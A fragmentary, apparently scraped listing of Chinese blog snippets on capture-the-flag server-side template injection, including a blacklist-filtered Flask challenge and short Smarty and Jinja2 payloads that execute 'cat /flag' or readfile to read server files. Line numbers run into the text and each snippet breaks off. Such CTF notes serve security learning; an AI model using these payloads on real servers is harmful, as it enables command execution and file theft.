baby_flaskJinja2 模板的 SSTI , 过滤的东西有点多.
123456789Hi young boy!</br>Do you like ssti?</br>blacklist</br> '.','[','\ ......
主要是记录下一些payload
smarty:
12345678910111213141516{if readfile('/flag')}{/if} smarty中的{if}标签中可以执行php语句{$smarty.version ......
361 3621{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}
363过滤引号
1{{config.__class ......
前言有关SSTI的一些知识 https://www.cnblogs.com/bmjoker/p/13508538.html
SSTI (Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者ge ......